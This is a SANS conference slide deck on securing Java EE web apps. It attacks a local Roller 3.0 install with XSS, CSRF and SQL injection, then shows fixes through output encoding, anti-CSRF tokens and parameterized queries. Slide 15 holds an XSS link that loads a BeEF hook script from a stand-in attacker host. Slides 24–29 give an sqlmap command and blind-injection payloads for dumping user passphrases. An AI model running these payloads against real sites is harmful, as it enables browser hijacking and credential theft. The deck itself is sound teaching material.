Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Securing Java EE Web Apps

5,928 views

Published on

Published in: Technology
  • Be the first to comment

Securing Java EE Web Apps

  1. 1. Securing Java EE Web Apps <ul><li>Frank Kim </li></ul><ul><li>Principal, ThinkSec </li></ul><ul><li>Author, SANS Institute </li></ul>
  2. 2. About <ul><li>Frank Kim </li></ul><ul><ul><li>Consultant, ThinkSec </li></ul></ul><ul><ul><li>Author, SANS Secure Coding in Java/JEE </li></ul></ul><ul><ul><li>SANS Application Security Curriculum Lead </li></ul></ul>
  3. 3. What You Should Know <ul><li>Hacking is not hard </li></ul><ul><li>Don’t trust any data </li></ul><ul><ul><li>Assume that your users are evil! </li></ul></ul>
  4. 4. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
  5. 5. Cross-Site Scripting (XSS) <ul><li>Occurs when unvalidated data is displayed back to the browser </li></ul><ul><li>Types of XSS </li></ul><ul><ul><li>Stored </li></ul></ul><ul><ul><li>Reflected </li></ul></ul><ul><ul><li>Document Object Model (DOM) based </li></ul></ul>
  6. 6. Cross-Site Request Forgery (CSRF)
  7. 7. SQL Injection (SQLi) <ul><li>Occurs when dynamic SQL queries are used </li></ul><ul><ul><li>By injecting arbitrary SQL commands, attackers can extend the meaning of the original query </li></ul></ul><ul><ul><li>Can potentially execute any SQL statement on the database </li></ul></ul><ul><li>Very powerful </li></ul><ul><ul><li>#1 on CWE/SANS Top 25 Most Dangerous Software Errors </li></ul></ul><ul><ul><li>#1 on OWASP Top 10 </li></ul></ul>
  8. 8. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
  9. 9. What are We Testing? <ul><li>Installation of Roller 3.0 </li></ul><ul><li>Fake install of SANS AppSec Street Fighter Blog </li></ul><ul><li>Want to simulate the actions that a real attacker might take </li></ul><ul><ul><li>There are definitely other avenues of attack </li></ul></ul><ul><ul><li>We're walking through one attack scenario </li></ul></ul>
  10. 10. Attack Scenario <ul><li>XSS to control the victim's browser </li></ul><ul><li>Combine XSS and CSRF to conduct a privilege escalation attack </li></ul><ul><ul><ul><li>- Use escalated privileges to access another feature </li></ul></ul></ul><ul><li>Use SQL Injection to access the database directly </li></ul>
  11. 11. Spot the Vuln - XSS
  12. 12. XSS in head.jsp
  13. 13. Testing the &quot;look&quot; Param <ul><li>Admin pages include head.jsp </li></ul><ul><li>The param is persistent for the session </li></ul>
  14. 14. XSS Exploitation <ul><li>Introducing BeEF </li></ul><ul><ul><li>Browser Exploitation Framework </li></ul></ul><ul><ul><li>http://www.bindshell.net/tools/beef </li></ul></ul><ul><li>Uses XSS to hook the victim's browser </li></ul><ul><ul><li>Log user keystrokes, view browsing history, execute JavaScript, etc </li></ul></ul><ul><ul><li>Advanced attacks - Metasploit integration, browser exploits, etc </li></ul></ul>
  15. 15. XSS Exploitation Overview Victim 1) Sends link with evil BeEF script http://localhost:8080/roller/roller-ui/yourWebsites.do?look=&quot;><script src=&quot;http://www.attacker.com/beef/hook/beefmagic.js.php&quot;></script> 2) Victim clicks evil link 3) Victim's browser sends data to attacker Attacker
  16. 16. BeEF XSS Demo
  17. 17. Spot the Vuln - CSRF
  18. 18. CSRF in UserAdmin.jsp Want to use CSRF to change this field
  19. 19. CSRF Demo
  20. 20. Spot the Vuln – SQL Injection
  21. 21. SQL Injection in UserServlet
  22. 22. SQL Injection Testing <ul><li>UserServlet is vulnerable to SQLi </li></ul><ul><ul><li>http://localhost:8080/roller/roller-ui/authoring/user </li></ul></ul>No results
  23. 23. Exploiting SQL Injection <ul><li>Introducing sqlmap </li></ul><ul><ul><li>http://sqlmap.sourceforge.net </li></ul></ul><ul><li>Tool that automates detection and exploitation of SQL Injection vulns </li></ul><ul><ul><li>Supports MySQL, Oracle, PostgreSQL, MS SQL Server </li></ul></ul><ul><ul><li>Supports blind, inband, and batch queries </li></ul></ul><ul><ul><li>Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc </li></ul></ul><ul><ul><li>Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc </li></ul></ul>
  24. 24. sqlmap Syntax <ul><li> Dump userids and passwords </li></ul><ul><ul><li>python sqlmap.py </li></ul></ul><ul><ul><li>-u &quot;http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25&quot; </li></ul></ul><ul><ul><li>--cookie &quot;username=test; JSESSIONID==<INSERT HERE>&quot; </li></ul></ul><ul><ul><li>--drop-set-cookie -p startsWith </li></ul></ul><ul><ul><li>--dump -T rolleruser -C username,passphrase -v 2 </li></ul></ul>
  25. 25. SQL Injection Demo
  26. 26. How it Works <ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy </li></ul><ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy </li></ul><ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy </li></ul>
  27. 27. Step By Step [0] <ul><li>SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1 ; </li></ul><ul><li>returns ilovethetajmahal </li></ul>
  28. 28. Step By Step [1] <ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1); </li></ul><ul><li>returns i </li></ul><ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1); </li></ul><ul><li>returns l </li></ul><ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1); </li></ul><ul><li>returns o </li></ul>
  29. 29. Step By Step [2] <ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1)); </li></ul><ul><li>returns 105 </li></ul><ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1)); </li></ul><ul><li>returns 108 </li></ul><ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1)); </li></ul><ul><li>returns 111 </li></ul>
  30. 30. Attack Summary <ul><li>XSS to control the victim's browser </li></ul><ul><li>Combine XSS and CSRF to conduct a privilege escalation attack </li></ul><ul><ul><ul><li>- Use escalated privileges to access another feature </li></ul></ul></ul><ul><li>Use SQL Injection to access the database directly </li></ul>
  31. 31. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
  32. 32. Data Validation Application Should I be consuming this? Should I be emitting this? Inbound Data Outbound Data Data Store Validation Encoding Encoding Validation Outbound Data Inbound Data Validation
  33. 33. Output Encoding <ul><li>Encoding </li></ul><ul><ul><li>Convert characters so they are treated as data and not special characters </li></ul></ul><ul><li>Must escape differently depending where data is displayed on the page </li></ul><ul><li>XSS Prevention Cheat Sheet </li></ul><ul><ul><li>http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet </li></ul></ul>
  34. 34. Fix XSS in head.jsp <ul><li>Add URL encoding </li></ul><ul><li><link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; media=&quot;all&quot; href=&quot;<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css&quot; /> </li></ul>
  35. 35. Fix CSRF <ul><li>UserAdmin.jsp </li></ul><ul><ul><li>Add anti-CSRF token </li></ul></ul><ul><li><input type=&quot;hidden&quot; name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> > </li></ul><ul><li>UserAdminAction.java </li></ul><ul><ul><li>Check anti-CSRF token </li></ul></ul><ul><li>if (!CSRFTokenUtil.isValid(req.getSession(false), req)){ </li></ul><ul><ul><li>return mapping.findForward(&quot;error&quot;); </li></ul></ul><ul><ul><li>} </li></ul></ul>
  36. 36. Fix SQL Injection <ul><li>Use parameterized queries correctly </li></ul><ul><li>if (startsWith == null || startsWith.equals(&quot;&quot;)) { </li></ul><ul><li>query = &quot;SELECT username, emailaddress FROM rolleruser&quot;; </li></ul><ul><li>stmt = con.prepareStatement(query); </li></ul><ul><li>} else { </li></ul><ul><li>query = &quot;SELECT username, emailaddress FROM rolleruser </li></ul><ul><li>WHERE username like ? or emailaddress like ? &quot;; </li></ul><ul><li>stmt = con.prepareStatement (query); </li></ul><ul><li>stmt.setString (1, startsWith + &quot;%&quot;); </li></ul><ul><li>stmt.setString (2, startsWith + &quot;%&quot;); </li></ul><ul><li>} </li></ul><ul><li>rs = stmt.executeQuery(); </li></ul>
  37. 37. Building Secure Software Source: Microsoft SDL
  38. 38. Remember <ul><li>Hacking is not hard </li></ul><ul><li>Don’t trust any data </li></ul><ul><ul><li>Validate input </li></ul></ul><ul><ul><ul><li>Prefer whitelists </li></ul></ul></ul><ul><ul><ul><li>Use authenticity token </li></ul></ul></ul><ul><ul><li>Encode output </li></ul></ul><ul><ul><ul><li>Contextual encoding </li></ul></ul></ul><ul><ul><ul><li>Use parameterized queries </li></ul></ul></ul>
  39. 39. SANS Software Security <ul><li>SANS AppSec 2012 </li></ul><ul><ul><li>- April 30 - May 1 in Las Vegas </li></ul></ul><ul><ul><li>- CFP is open now! </li></ul></ul><ul><ul><li>- http://sans.org/appsec-2012 </li></ul></ul><ul><li>New courses </li></ul><ul><ul><li>- DEV551 Secure iOS Development </li></ul></ul><ul><ul><li>- DEV568 Secure Android Development </li></ul></ul><ul><li>Free resources </li></ul><ul><ul><li>- Top 25, blog, white papers, webcasts, and more at </li></ul></ul><ul><ul><li>- http://software-security.sans.org </li></ul></ul><ul><li>Discount </li></ul><ul><ul><li>- Save 10% using the discount code DEVOXX. Enterprise pricing avail. </li></ul></ul>
  40. 40. Thanks! <ul><li>Frank Kim </li></ul><ul><li>[email_address] @sansappsec </li></ul>

×